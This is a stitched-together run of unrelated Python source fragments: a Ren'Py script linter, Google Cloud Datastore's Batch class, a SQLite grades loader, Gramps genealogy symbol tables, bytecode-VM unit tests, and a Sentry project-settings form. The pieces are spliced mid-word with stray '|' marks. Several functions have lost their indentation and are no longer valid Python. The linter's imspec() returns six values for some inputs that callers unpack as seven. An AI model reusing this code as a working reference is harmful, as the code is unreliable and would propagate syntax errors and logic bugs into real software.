    if present is False:
        report("%s uses file '%s', which is not loadable.", what.capitalize(), fn)
        return

    if not renpy.loader.loadable(fn):
        report("%s uses file '%s', which is not loadable.", what.capitalize(), fn)
        check_file_cache[fn] = False
        return

    check_file_cache[fn] = True

    # If transfn() raises, the case check below cannot be performed;
    # bail out quietly.
    try:
        renpy.loader.transfn(fn)
    except:
        return

    # NOTE(review): transfn() is called a second time here; the first
    # call's result could be reused.
    if renpy.loader.transfn(fn) and \
        fn.lower() in filenames and \
        fn != filenames[fn.lower()]:
        report("Filename case mismatch for %s. '%s' was used in the script, but '%s' was found on disk.", what, fn, filenames[fn.lower()])
        add("Case mismatches can lead to problems on Mac, Linux/Unix, and when archiving images. To fix them, either rename the file on disk, or the filename use in the script.")
def check_displayable(what, d):
    """Predict the files displayable *d* may load, checking each one."""
    predicted = []
    d.predict(lambda img: predicted.extend(img.predict_files()))
    for fn in predicted:
        check_file(what, fn)
# Lints ast.Image nodes.
def check_image(node):
    """Lint an ast.Image node: check the files behind the declared image."""
    label = " ".join(node.imgname)
    check_displayable('image %s' % label, renpy.exports.images[node.imgname])
def imspec(t):
if len(t) == 3:
return t[0], None, None, t[1], t[2], 0
if len(t) == 6:
return t[0], t[1], t[2], t[3], t[4], t[5], None
else:
return t
# Lints ast.Show and ast.Scene nodets.
def check_show(node):
    """Lint an ast.Show or ast.Scene node: layer validity, image
    declaration, and evaluability of the at-list.

    NOTE(review): this unpack expects 7 values; verify imspec() yields
    7 elements for every input shape it accepts.
    """
    # A Scene may have an empty imspec.
    if not node.imspec:
        return

    name, expression, tag, at_list, layer, zorder, behind = imspec(node.imspec)

    if layer not in renpy.config.layers and layer not in renpy.config.top_layers:
        report("Uses layer '%s', which is not in config.layers.", layer)

    image_exists(name, expression, tag)

    for i in at_list:
        try_eval("the at list of a scene or show statment", i, "Perhaps you forgot to declare, or misspelled, a position?")
# Lints ast.Hide.
def check_hide(node):
    """Lint an ast.Hide node: layer validity and that the hidden tag was
    declared or previously shown.

    NOTE(review): this unpack expects 7 values; verify imspec() yields
    7 elements for every input shape it accepts.
    """
    name, expression, tag, at_list, layer, zorder, behind = imspec(node.imspec)

    # Fall back to the first name component when no explicit tag is given.
    tag = tag or name[0]

    if layer not in renpy.config.layers and layer not in renpy.config.top_layers:
        report("Uses layer '%s', which is not in config.layers.", layer)

    if tag not in image_prefixes:
        report("The image tag '%s' is not the prefix of a declared image, nor was it used in a show statement before this hide statement.", tag)

    # for i in at_list:
    #    try_eval(node, "at list of hide statment", i)
def check_with(node):
    """Lint a with statement/clause: its expression must evaluate."""
    try_eval("a with statement or clause", node.expr, "Perhaps you forgot to declare, or misspelled, a transition?")
def check_user(node):
    """Lint a creator-defined statement node.

    Runs the statement's own "lint" handler with its errors routed into
    report(), then checks that the node can compute its successor.
    """
    def error(msg):
        report("%s", msg)

    # Route errors raised by the user statement's lint handler into our
    # report stream for the duration of the call.
    renpy.exports.push_error_handler(error)
    try:
        node.call("lint")
    finally:
        renpy.exports.pop_error_handler()

    try:
        node.get_next()
    except:
        report("Didn't properly report what the next statement should be.")
check_text_tags = renpy.display.text.check_text_tags

def text_checks(s):
    """Lint dialogue/menu text *s*: validate its text tags, then validate
    any %-style interpolation codes embedded in it.

    The scanner is a small state machine:
      state 0 -- ordinary text,
      state 1 -- inside a % conversion (flags/width/length/type),
      state 2 -- inside a %(name) mapping key.
    """
    msg = renpy.display.text.check_text_tags(s)
    if msg:
        report("%s (in %s)", msg, repr(s)[1:])

    if "%" in s:

        state = 0
        pos = 0
        fmt = ""
        while pos < len(s):
            c = s[pos]
            pos += 1

            # Not in a format.
            if state == 0:
                if c == "%":
                    state = 1
                    fmt = "%"

            # In a format.
            elif state == 1:
                fmt += c
                if c == "(":
                    state = 2
                # BUG FIX: the flag/width set previously read
                # "#0123456780- +hlL" -- '9' was missing (and '0'
                # duplicated), so any width containing a 9 (e.g. "%9d")
                # was misreported as an unknown format code.
                elif c in "#0123456789- +hlL":
                    state = 1
                elif c in "diouxXeEfFgGcrs%":
                    state = 0
                else:
                    report("Unknown string format code '%s' (in %s)", fmt, repr(s)[1:])
                    state = 0

            # In a mapping key.
            elif state == 2:
                fmt += c
                if c == ")":
                    state = 1

        if state != 0:
            report("Unterminated string format code '%s' (in %s)", fmt, repr(s)[1:])
def check_say(node):
    """Lint an ast.Say node: who/with expressions and the dialogue text."""
    if node.who:
        try_eval("the who part of a say statement", node.who, "Perhaps you forgot to declare a character?")
    if node.with_:
        try_eval("the with clause of a say statement", node.with_, "Perhaps you forgot to declare, or misspelled, a transition?")
    text_checks(node.what)
def check_menu(node):
    """Lint an ast.Menu node: with clause, per-item conditions and labels,
    and that at least one choice is selectable."""
    if node.with_:
        try_eval("the with clause of a menu statement", node.with_, "Perhaps you forgot to declare, or misspelled, a transition?")

    # items are (label, condition, block); an item with no block is a
    # caption, not a selectable choice.
    if not [ (l, c, b) for l, c, b in node.items if b ]:
        report("The menu does not contain any selectable choices.")

    for l, c, b in node.items:
        if c:
            try_compile("in the if clause of a menuitem", c)
        text_checks(l)
def check_jump(node):
    """Report jumps whose target label is not defined in the script."""
    if node.expression:
        # Computed targets cannot be checked statically.
        return
    if renpy.game.script.has_label(node.target):
        return
    report("The jump is to nonexistent label '%s'.", node.target)
def check_call(node):
# if not isinstance(node.next.name, basestring):
# report(node, "The call does not have a from clause associated with it.")
# add("You can add from c |
he License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# Se | e the License for the specific language governing permissions and
# limitations under the License.
"""Create | / interact with a batch of updates / deletes.
Batches provide the ability to execute multiple operations
in a single request to the Cloud Datastore API.
See
https://cloud.google.com/datastore/docs/concepts/entities#batch_operations
"""
from google.cloud.datastore import helpers
from google.cloud.datastore_v1.proto import datastore_pb2 as _datastore_pb2
class Batch(object):
"""An abstraction representing a collected group of updates / deletes.
Used to build up a bulk mutation.
For example, the following snippet of code will put the two ``save``
operations and the ``delete`` operation into the same mutation, and send
them to the server in a single API request::
>>> from google.cloud import datastore
>>> client = datastore.Client()
>>> batch = client.batch()
>>> batch.begin()
>>> batch.put(entity1)
>>> batch.put(entity2)
>>> batch.delete(key3)
>>> batch.commit()
You can also use a batch as a context manager, in which case
:meth:`commit` will be called automatically if its block exits without
raising an exception::
>>> with batch:
... batch.put(entity1)
... batch.put(entity2)
... batch.delete(key3)
By default, no updates will be sent if the block exits with an error::
>>> with batch:
... do_some_work(batch)
... raise Exception() # rolls back
:type client: :class:`google.cloud.datastore.client.Client`
:param client: The client used to connect to datastore.
"""
_id = None # "protected" attribute, always None for non-transactions
_INITIAL = 0
"""Enum value for _INITIAL status of batch/transaction."""
_IN_PROGRESS = 1
"""Enum value for _IN_PROGRESS status of batch/transaction."""
_ABORTED = 2
"""Enum value for _ABORTED status of batch/transaction."""
_FINISHED = 3
"""Enum value for _FINISHED status of batch/transaction."""
def __init__(self, client):
self._client = client
self._mutations = []
self._partial_key_entities = []
self._status = self._INITIAL
    def current(self):
        """Return the topmost batch / transaction, or None.

        Delegates to the owning client, which tracks the active
        batch/transaction.
        """
        return self._client.current_batch
    @property
    def project(self):
        """Getter for project in which the batch will run.

        :rtype: :class:`str`
        :returns: The project in which the batch will run.
        """
        # Always the owning client's project; batches never override it.
        return self._client.project
    @property
    def namespace(self):
        """Getter for namespace in which the batch will run.

        :rtype: :class:`str`
        :returns: The namespace in which the batch will run.
        """
        # Taken directly from the owning client.
        return self._client.namespace
def _add_partial_key_entity_pb(self):
"""Adds a new mutation for an entity with a partial key.
:rtype: :class:`.entity_pb2.Entity`
:returns: The newly created entity protobuf that will be
updated and sent with a commit.
"""
new_mutation = _datastore_pb2.Mutation()
self._mutations.append(new_mutation)
return new_mutation.insert
def _add_complete_key_entity_pb(self):
"""Adds a new mutation for an entity with a completed key.
:rtype: :class:`.entity_pb2.Entity`
:returns: The newly created entity protobuf that will be
updated and sent with a commit.
"""
# We use ``upsert`` for entities with completed keys, rather than
# ``insert`` or ``update``, in order not to create race conditions
# based on prior existence / removal of the entity.
new_mutation = _datastore_pb2.Mutation()
self._mutations.append(new_mutation)
return new_mutation.upsert
def _add_delete_key_pb(self):
"""Adds a new mutation for a key to be deleted.
:rtype: :class:`.entity_pb2.Key`
:returns: The newly created key protobuf that will be
deleted when sent with a commit.
"""
new_mutation = _datastore_pb2.Mutation()
self._mutations.append(new_mutation)
return new_mutation.delete
    @property
    def mutations(self):
        """Getter for the changes accumulated by this batch.

        Every batch is committed with a single commit request containing all
        the work to be done as mutations. Inside a batch, calling :meth:`put`
        with an entity, or :meth:`delete` with a key, builds up the request by
        adding a new mutation. This getter returns the protobuf that has been
        built-up so far.

        :rtype: iterable
        :returns: The list of :class:`.datastore_pb2.Mutation`
                  protobufs to be sent in the commit request.
        """
        # NOTE(review): returns the live list, not a copy -- callers can
        # mutate batch state through it.
        return self._mutations
def put(self, entity):
"""Remember an entity's state to be saved during :meth:`commit`.
.. note::
Any existing properties for the entity will be replaced by those
currently set on this instance. Already-stored properties which do
not correspond to keys set on this instance will be removed from
the datastore.
.. note::
Property values which are "text" ('unicode' in Python2, 'str' in
Python3) map to 'string_value' in the datastore; values which are
"bytes" ('str' in Python2, 'bytes' in Python3) map to 'blob_value'.
When an entity has a partial key, calling :meth:`commit` sends it as
an ``insert`` mutation and the key is completed. On return,
the key for the ``entity`` passed in is updated to match the key ID
assigned by the server.
:type entity: :class:`google.cloud.datastore.entity.Entity`
:param entity: the entity to be saved.
:raises: :class:`~exceptions.ValueError` if the batch is not in
progress, if entity has no key assigned, or if the key's
``project`` does not match ours.
"""
if self._status != self._IN_PROGRESS:
raise ValueError("Batch must be in progress to put()")
if entity.key is None:
raise ValueError("Entity must have a key")
if self.project != entity.key.project:
raise ValueError("Key must be from same project as batch")
if entity.key.is_partial:
entity_pb = self._add_partial_key_entity_pb()
self._partial_key_entities.append(entity)
else:
entity_pb = self._add_complete_key_entity_pb()
_assign_entity_to_pb(entity_pb, entity)
def delete(self, key):
"""Remember a key to be deleted during :meth:`commit`.
:type key: :class:`google.cloud.datastore.key.Key`
:param key: the key to be deleted.
:raises: :class:`~exceptions.ValueError` if the batch is not in
progress, if key is not complete, or if the key's
``project`` does not match ours.
"""
if self._status != self._IN_PROGRESS:
raise ValueError("Batch must be in progress to delete()")
if key.is_partial:
raise ValueError("Key must be complete")
if self.project != key.project:
raise ValueError("Key must be from same project as batch")
key_pb = key.to_protobuf()
self._add_delete_key_pb().CopyFrom(key_pb)
def begin(self):
"""Begins a batch.
This method is called automatically when entering a with
statement, however it can be called explicitly if you don't want
to use a context manager.
Overridden by :class:`google.cloud.datastore.tra |
# NEVER DO THIS IN SQL!
from Repository.Loader import Loader, LoaderException
from Domain import Grade, Student, Discipline
import sqlite3
class SQLLoader(Loader):
    """Loader backend persisting the repository to a SQLite file.

    save() rewrites the whole database (drop + recreate + bulk insert);
    load() repopulates the repository from the three tables.
    """
    def __init__(self, repo):
        self.repo = repo
        # One connection/cursor per loader, at <storage path>.sqlite.
        # NOTE(review): the connection is never explicitly closed.
        self.conn = sqlite3.connect(self.repo.getStoragePath() + ".sqlite")
        self.cursor = self.conn.cursor()

    def save(self):
        """Dump students, disciplines and grades, replacing prior data."""
        # serializable = {'students': [], 'disciplines': [], 'grades': []}
        self.cursor.execute('''DROP TABLE IF EXISTS students;''')
        self.cursor.execute('''DROP TABLE IF EXISTS disciplines;''')
        self.cursor.execute('''DROP TABLE IF EXISTS grades;''')
        # eww
        self.cursor.execute('''CREATE TABLE students (id int, name text)''')
        self.cursor.execute('''CREATE TABLE disciplines (id int, name text)''')
        self.cursor.execute('''CREATE TABLE grades (did int, sid int, grade int)''')
        # Flatten the domain objects into plain tuples for executemany.
        serializable = {
            'students': [(student.getId(), student.getName()) for student in self.repo.getStudents()],
            'disciplines': [(discipline.getId(), discipline.getName()) for discipline in
                            self.repo.getDisciplines()],
            'grades': [(grade.getDisciplineId(), grade.getStudentId(), grade.getGrade()) for grade in
                       self.repo.getGrades()]}
        # Parameterized statements -- values are bound, never interpolated.
        self.cursor.executemany('INSERT INTO students VALUES (?,?)', serializable['students'])
        self.cursor.executemany('INSERT INTO disciplines VALUES (?,?)', serializable['disciplines'])
        self.cursor.executemany('INSERT INTO grades VALUES (?,?,?)', serializable['grades'])
        self.conn.commit()

    def load(self):
        """Rebuild the repository from the database; return True on success.

        NOTE(review): failures are logged with a '[StudentRepository]'
        prefix although this class is SQLLoader -- confirm intended.
        """
        try:
            self.repo._createNewRepo()
            for row in self.cursor.execute('SELECT * FROM students'):
                # Trailing False flag: presumably "don't re-persist while
                # loading" -- confirm against the repository API.
                self.repo.addStudent(Student.Student(row[0], row[1]), False)
            for row in self.cursor.execute('SELECT * FROM disciplines'):
                self.repo.addDiscipline(Discipline.Discipline(row[0], row[1]), False)
            for row in self.cursor.execute('SELECT * FROM grades'):
                self.repo.addGrade(Grade.Grade(row[0], row[1], row[2]), False)
            return True
        except Exception as ex:
            print('[StudentRepository]', ex)
            return False
# eval studentCatalogController._repo._converter(0)
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2015- Serge Noiraud
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public Lic | ense as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public Licens | e for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# https://en.wikipedia.org/wiki/Miscellaneous_Symbols
# http://www.w3schools.com/charsets/ref_utf_symbols.asp
#
#-------------------------------------------------------------------------
#
# Standard python modules
#
#-------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
from gramps.gen.config import config
_ = glocale.translation.sgettext
# pylint: disable=superfluous-parens
# pylint: disable=anomalous-unicode-escape-in-string
class Symbols(object):
    """Lookup tables for genealogical UTF-8 symbols.

    Two tables are kept:

    * ``all_symbols`` -- general genealogy glyphs (gender, birth, marriage,
      burial, ...), indexed by the ``SYMBOL_*`` constants.
    * ``death_symbols`` -- alternative death markers, indexed by the
      ``DEATH_SYMBOL_*`` constants; offered in the global preferences.

    Each row is ``(translated name, utf-8 glyph, substitution)`` where the
    substitution is a user-configured fallback string used when the glyph is
    missing from the selected font.
    """
    # genealogical symbols
    SYMBOL_FEMALE = 0
    SYMBOL_MALE = 1
    SYMBOL_ASEXUAL_SEXLESS = 2 # Unknown
    SYMBOL_LESBIAN = 3
    SYMBOL_MALE_HOMOSEXUAL = 4
    SYMBOL_HETEROSEXUAL = 5
    SYMBOL_HERMAPHRODITE = 6
    SYMBOL_TRANSGENDER = 7
    SYMBOL_NEUTER = 8
    SYMBOL_ILLEGITIM = 9
    SYMBOL_BIRTH = 10
    SYMBOL_BAPTISM = 11 # CHRISTENING
    SYMBOL_ENGAGED = 12
    SYMBOL_MARRIAGE = 13
    SYMBOL_DIVORCE = 14
    SYMBOL_UNMARRIED_PARTNERSHIP = 15
    SYMBOL_BURIED = 16
    SYMBOL_CREMATED = 17 # Funeral urn
    SYMBOL_KILLED_IN_ACTION = 18
    SYMBOL_EXTINCT = 19
    # genealogical death symbols
    DEATH_SYMBOL_NONE = 0
    DEATH_SYMBOL_X = 1
    DEATH_SYMBOL_SKULL = 2
    DEATH_SYMBOL_ANKH = 3
    DEATH_SYMBOL_ORTHODOX_CROSS = 4
    DEATH_SYMBOL_CHI_RHO = 5
    DEATH_SYMBOL_LORRAINE_CROSS = 6
    DEATH_SYMBOL_JERUSALEM_CROSS = 7
    DEATH_SYMBOL_STAR_CRESCENT = 8
    DEATH_SYMBOL_WEST_SYRIAC_CROSS = 9
    DEATH_SYMBOL_EAST_SYRIAC_CROSS = 10
    DEATH_SYMBOL_HEAVY_GREEK_CROSS = 11
    DEATH_SYMBOL_LATIN_CROSS = 12
    DEATH_SYMBOL_SHADOWED_LATIN_CROSS = 13
    DEATH_SYMBOL_MALTESE_CROSS = 14
    DEATH_SYMBOL_STAR_OF_DAVID = 15
    DEATH_SYMBOL_DEAD = 16
    def __init__(self):
        """Build the symbol tables, reading user substitutions from config."""
        # NOTE(review): ``symbols`` is never used inside this class --
        # presumably assigned by callers; confirm before removing.
        self.symbols = None
        self.all_symbols = [
            # Name UNICODE SUBSTITUTION
            (_("Female"), '\u2640', ""),
            (_("Male"), '\u2642', ""),
            (_("Asexuality, sexless, genderless"), '\u26aa', ""),
            (_("Lesbianism"), '\u26a2', ""),
            (_("Male homosexuality"), '\u26a3', ""),
            (_("Heterosexuality"), '\u26a4', ""),
            (_("Transgender, hermaphrodite (in entomology)"), '\u26a5', ""),
            (_("Transgender"), '\u26a6', ""),
            (_("Neuter"), '\u26b2', ""),
            (_("Illegitimate"), '\u229b', ""),
            (_("Birth"), '\u002a', config.get('utf8.birth-symbol')),
            (_("Baptism/Christening"), '\u007e',
             config.get('utf8.baptism-symbol')),
            (_("Engaged"), '\u26ac', config.get('utf8.engaged-symbol')),
            (_("Marriage"), '\u26ad', config.get('utf8.marriage-symbol')),
            (_("Divorce"), '\u26ae', config.get('utf8.divorce-symbol')),
            (_("Unmarried partnership"), '\u26af',
             config.get('utf8.partner-symbol')),
            (_("Buried"), '\u26b0', config.get('utf8.buried-symbol')),
            (_("Cremated/Funeral urn"), '\u26b1',
             config.get('utf8.cremated-symbol')),
            (_("Killed in action"), '\u2694', config.get('utf8.killed-symbol')),
            (_("Extinct"), '\u2021', "")]
        # The following is used in the global preferences in the display tab.
        # Name UNICODE SUBSTITUTION
        self.death_symbols = [(_("Nothing"), "", ""),
                              ("x", "x", "x"),
                              (_("Skull and crossbones"), "\u2620",
                               config.get('utf8.dead-symbol')),
                              (_("Ankh"), "\u2625",
                               config.get('utf8.dead-symbol')),
                              (_("Orthodox cross"), "\u2626",
                               config.get('utf8.dead-symbol')),
                              (_("Chi rho"), "\u2627",
                               config.get('utf8.dead-symbol')),
                              (_("Cross of Lorraine"), "\u2628",
                               config.get('utf8.dead-symbol')),
                              (_("Cross of Jerusalem"), "\u2629",
                               config.get('utf8.dead-symbol')),
                              (_("Star and crescent"), "\u262a",
                               config.get('utf8.dead-symbol')),
                              (_("West Syriac cross"), "\u2670",
                               config.get('utf8.dead-symbol')),
                              (_("East Syriac cross"), "\u2671",
                               config.get('utf8.dead-symbol')),
                              (_("Heavy Greek cross"), "\u271a",
                               config.get('utf8.dead-symbol')),
                              (_("Latin cross"), "\u271d",
                               config.get('utf8.dead-symbol')),
                              (_("Shadowed White Latin cross"), "\u271e",
                               config.get('utf8.dead-symbol')),
                              (_("Maltese cross"), "\u2720",
                               config.get('utf8.dead-symbol')),
                              (_("Star of David"), "\u2721",
                               config.get('utf8.dead-symbol')),
                              # NOTE(review): unlike the rows above, this
                              # entry stores the word "Dead", not a glyph.
                              (_("Dead"), ("Dead"), _("Dead"))]
    #
    # functions for general symbols
    #
    def get_symbol_for_html(self, symbol):
        """ return the html string like '&#9898;' """
        return '&#%d;' % ord(self.all_symbols[symbol][1])
    def get_symbol_name(self, symbol):
        """
        Return the name of the symbol.
        """
        return self.all_symbols[symbol][0]
    def get_symbol_for_string(self, symbol):
        """ return the utf-8 character like '\u2670' """
        return self.all_symbols[symbol][1]
    def get_symbol_fallback(self, symbol):
        """
        Return the replacement string.
        This is used if the utf-8 symbol in not present within a font.
        """
        return self.all_symbols[symbol][2]
    #
    # functions for death symbols
    #
    def get_death_symbols(self):
        """
        Return the list of death symbols.
        This is used in the global preference to choose which symbol we'll use.
        """
        return self.death_symbols
    def get_death_symbol_name(self, symbol):
        """
        Return the name of the symbol.
        """
        return self.death_symbols[symbol][0]
    def get_death_symbol_for_html(self, symbol):
        """
        return the html string like '&#9898;'.

        NOTE(review): ord() raises TypeError for the empty/multi-character
        entries (DEATH_SYMBOL_NONE, DEATH_SYMBOL_DEAD) -- presumably callers
        only pass single-glyph symbols; confirm.
        """
        return '&#%d;' % ord(self.death_symbols[symbol][1])
    def get_death_symbol_for_char(self, symbol):
        """
        Return the utf-8 character for the symbol.
        """
        return self.death_symbols[symbol][1]
    def get_death_symbol_fallback(self, symbol):
        """
        Return the string replacement for the symbol.
        """
        return self.death_symbols[symbol][2]
    #
    # functions for all symbols
    #
    def get_how_many_symbols(self):
        # NOTE(review): the "- 4" offset is unexplained here -- presumably it
        # excludes entries that are not selectable; confirm against callers.
        return len(self.death_symbols) + len(self.all_symbols) - 4
|
import sys
sys.path.insert(0, "../")
import unittest
from dip.typesystem import DNull, DBool, DInteger, DString, DList
from dip.compiler import BytecodeCompiler
from dip.interpreter import VirtualMachine
from dip.namespace import Namespace
class TestInterpreter(unittest.TestCase):
    """End-to-end VM tests: compile a small bytecode listing and execute it."""
    def _execute_simple(self, code, data):
        """Compile *code* (with constant pool *data*) as ``main`` and run it.

        Returns the value handed to the VM's result callback.
        """
        result = [None]
        def getresult(val):
            # Result callback; captures the VM's output via closure.
            result[0] = val
        vm = VirtualMachine([], getresult)
        globalns = Namespace("globals")
        ctx = BytecodeCompiler("main", code, data, namespace=globalns)
        globalns.set_func("main", ctx.mkfunc())
        vm.setglobals(globalns)
        vm.run(pass_argv=False)
        return result[0]
    def test_add(self):
        """ADD stores data0 + data1 into data2."""
        result = self._execute_simple("""
            ADD 0 1 2 # 0
            RET 2 # 1
        """, [
            DInteger.new_int(32), # data0
            DInteger.new_int(64), # data1
            DInteger(), # data2
        ])
        self.assertEqual(result.int_py(), 96)
    def test_sub(self):
        """SUB stores data0 - data1 into data2."""
        result = self._execute_simple("""
            SUB 0 1 2 # 0
            RET 2 # 1
        """, [
            DInteger.new_int(64), # data0
            DInteger.new_int(32), # data1
            DInteger(), # data2
        ])
        self.assertEqual(result.int_py(), 32)
    def test_mul(self):
        """MUL stores data0 * data1 into data2."""
        result = self._execute_simple("""
            MUL 0 1 2 # 0
            RET 2 # 1
        """, [
            DInteger.new_int(64), # data0
            DInteger.new_int(32), # data1
            DInteger(), # data2
        ])
        self.assertEqual(result.int_py(), 2048)
    def test_div(self):
        """DIV stores data0 / data1 into data2."""
        result = self._execute_simple("""
            DIV 0 1 2 # 0
            RET 2 # 1
        """, [
            DInteger.new_int(64), # data0
            DInteger.new_int(2), # data1
            DInteger(), # data2
        ])
        self.assertEqual(result.int_py(), 32)
    def test_jump(self):
        """JMP skips instruction 1, so the second RET executes."""
        result = self._execute_simple("""
            JMP 2 # 0
            RET 0 # 1
            RET 1 # 2
        """, [
            DInteger.new_int(16), # data0
            DInteger.new_int(32), # data1
        ])
        self.assertEqual(result.int_py(), 32)
    def test_len(self):
        """LEN stores the length of the string data0 into data1."""
        result = self._execute_simple("""
            LEN 0 1 # 0
            RET 1 # 1
        """, [
            DString.new_str("neat"), # data0
            DInteger(), # data1
        ])
        self.assertEqual(result.int_py(), 4)
    def test_eq(self):
        """EQ compares integers and strings, storing a boolean result."""
        result = self._execute_simple("""
            EQ 0 1 2 # 0
            RET 2 # 1
        """, [
            DInteger.new_int(4), # data0
            DInteger.new_int(5), # data1
            DBool(), # data2
        ])
        self.assertEqual(result.int_py(), False)
        result = self._execute_simple("""
            EQ 0 1 2 # 0
            RET 2 # 1
        """, [
            DString.new_str("neat"), # data0
            DString.new_str("neat"), # data1
            DBool(), # data2
        ])
        self.assertEqual(result.int_py(), True)
    def test_branch(self):
        """BF (branch-if-false) jumps over the first RET when EQ is false."""
        result = self._execute_simple("""
            EQ 0 1 2 # 0
            BF 2 3 # 1
            RET 0 # 2
            LABEL :some_label # 3
            RET 3 # 4
        """, [
            DInteger.new_int(4), # data0
            DInteger.new_int(5), # data1
            DBool(), # data2
            DInteger.new_int(999), # data3
        ])
        self.assertEqual(result.int_py(), 999)
    def test_lists(self):
        """LIST_NEW/LIST_ADD/LIST_REM plus LEN: add three items, remove one,
        and check the length before and after."""
        result = self._execute_simple("""
            LIST_NEW 0
            LIST_ADD 0 1 # 0 data0.append(data1)
            LIST_ADD 0 1 # 1 data0.append(data1)
            LIST_ADD 0 2 # 2 data0.append(data2)
            LEN 0 3 # 3 data3 = len(data0)
            EQ 3 5 6 # 4 data6 = (data3 == data5)
            LIST_REM 0 4 # 5 data0.remove(data4 (represents an index))
            LEN 0 3 # 6 data3 = len(data0)
            NEQ 3 5 7 # 7 data7 = (data3 != data5)
            EQ 6 7 8 # 8 data8 = (data6 == data7)
            RET 8 # 9 return data8
        """, [
            DList(), # data0, list
            DInteger.new_int(5), # data1, fake value to add to the list
            DString.new_str("hi"), # data2, fake value to add to the list
            DInteger(), # data3, list length
            DInteger.new_int(2), # data4, list index
            DInteger.new_int(3), # data5, expected list length
            DBool(), # data6, comp1
            DBool(), # data7, comp2
            DBool(), # data8, output
        ])
        self.assertEqual(result.int_py(), True)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
rom being stored for new events.'),
required=False
)
# JavaScript options
scrape_javascript = forms.BooleanField(
label=_('Enable JavaScript source fetching'),
help_text=_('Allow Sentry to scrape missing JavaScript source context when possible.'),
required=False,
)
# Options that are overridden by Organization level settings
org_overrides = ('scrub_data', 'scrub_defaults', 'scrub_ip_address')
default_environment = forms.CharField(
label=_('Default Environment'),
help_text=_('The default selected environment when viewing issues.'),
widget=forms.TextInput(attrs={'placeholder': _('e.g. production')}),
required=False,
)
mail_subject_prefix = forms.CharField(
label=_('Subject Prefix'),
required=False,
help_text=_('Choose a custom prefix for emails from this project.')
)
    class Meta:
        # ModelForm configuration: only these model attributes are written
        # through the ORM; the remaining form fields are persisted as
        # per-project options by the view that consumes this form.
        fields = ('name', 'team', 'slug')
        model = Project
def __init__(self, request, organization, team_list, data, instance, *args, **kwargs):
# First, we need to check for the value overrides from the Organization options
# We need to do this before `initial` gets passed into the Form.
disabled = []
if 'initial' in kwargs:
for opt in self.org_overrides:
value = bool(organization.get_option('sentry:require_%s' % (opt, ), False))
if value:
disabled.append(opt)
kwargs['initial'][opt] = value
super(EditProjectForm, self).__init__(data=data, instance=instance, *args, **kwargs)
self.organization = organization
self.team_list = team_list
self.fields['team'].choices = self.get_team_choices(team_list, instance.team)
self.fields['team'].widget.choices = self.fields['team'].choices
# After the Form is initialized, we now need to disable the fields that have been
# overridden from Organization options.
for opt in disabled:
self.fields[opt].widget.attrs['disabled'] = 'disabled'
def get_team_label(self, team):
return '%s (%s)' % (team.name, team.slug)
def get_team_choices(self, team_list, default=None):
sorted_team_list = sorted(team_list, key=lambda x: x.name)
choices = []
for team in sorted_team_list:
# TODO: optimize queries
choices.append((team.id, self.get_team_label(team)))
if default is None:
choices.insert(0, (-1, mark_safe('–' * 8)))
elif default not in sorted_team_list:
choices.insert(0, (default.id, self.get_team_label(default)))
return choices
def clean_sensitive_fields(self):
value = self.cleaned_data.get('sensitive_fields')
if not value:
return
return filter(bool, (v.lower().strip() for v in value.split('\n')))
def clean_safe_fields(self):
value = self.cleaned_data.get('safe_fields')
if not value:
return
return filter(bool, (v.lower().strip() for v in value.split('\n')))
def clean_team(self):
value = self.cleaned_data.get('team')
if not value:
return
# TODO: why is this not already an int?
value = int(value)
if value == -1:
return
if self.instance.team and value == self.instance.team.id:
return self.instance.team
for team in self.team_list:
if value == team.id:
return team
raise forms.ValidationError('Unable to fi | nd chosen team')
def clean_slug(self):
slug = self. | cleaned_data.get('slug')
if not slug:
return
other = Project.objects.filter(
slug=slug, organization=self.organization
).exclude(id=self.instance.id).first()
if other is not None:
raise forms.ValidationError(
'Another project (%s) is already '
'using that slug' % other.name
)
return slug
def clean_token(self):
token = self.cleaned_data.get('token')
if not token:
return
token_re = r'^[-a-zA-Z0-9+/= ]{1,255}$'
if not re.match(token_re, token):
raise forms.ValidationError('Invalid security token, must be: %s' % token_re)
return token
def clean_token_header(self):
token_header = self.cleaned_data.get('token_header')
if not token_header:
return
header_re = r'^[a-zA-Z0-9-]{1,20}$'
if not re.match(header_re, token_header):
raise forms.ValidationError('Invalid header value, must be: %s' % header_re)
return token_header
class ProjectSettingsView(ProjectView):
required_scope = 'project:write'
    def get_form(self, request, project):
        """Build the EditProjectForm for *project*, pre-filled from options.

        Side effect: if the project has no security token yet, one is minted
        and persisted so later requests reuse it.
        """
        organization = project.organization
        # Only offer teams the requesting user can actually administer.
        team_list = [
            t for t in Team.objects.get_for_user(
                organization=organization,
                user=request.user,
            ) if request.access.has_team_scope(t, self.required_scope)
        ]
        # TODO(dcramer): this update should happen within a lock
        security_token = project.get_option('sentry:token', None)
        if security_token is None:
            security_token = uuid1().hex
            project.update_option('sentry:token', security_token)
        return EditProjectForm(
            request,
            organization,
            team_list,
            request.POST or None,
            instance=project,
            initial={
                'origins':
                '\n'.join(project.get_option('sentry:origins', ['*'])),
                'token':
                security_token,
                'token_header':
                project.get_option('sentry:token_header'),
                'verify_ssl':
                bool(project.get_option('sentry:verify_ssl', False)),
                'resolve_age':
                int(project.get_option('sentry:resolve_age', 0)),
                'scrub_data':
                bool(project.get_option('sentry:scrub_data', True)),
                'scrub_defaults':
                bool(project.get_option('sentry:scrub_defaults', True)),
                'sensitive_fields':
                '\n'.join(project.get_option('sentry:sensitive_fields', None) or []),
                'safe_fields':
                '\n'.join(project.get_option('sentry:safe_fields', None) or []),
                'scrub_ip_address':
                bool(project.get_option('sentry:scrub_ip_address', False)),
                'scrape_javascript':
                bool(project.get_option('sentry:scrape_javascript', True)),
